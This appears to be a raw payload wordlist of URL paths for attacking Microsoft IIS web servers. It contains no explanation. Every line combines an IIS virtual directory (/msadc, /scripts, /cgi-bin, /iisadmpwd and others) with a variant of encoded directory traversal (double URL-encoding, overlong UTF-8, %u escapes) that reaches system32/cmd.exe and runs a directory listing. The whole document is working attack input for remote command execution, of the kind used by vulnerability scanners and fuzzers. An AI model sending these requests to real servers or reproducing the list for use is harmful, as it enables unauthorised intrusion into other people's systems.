/msadc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
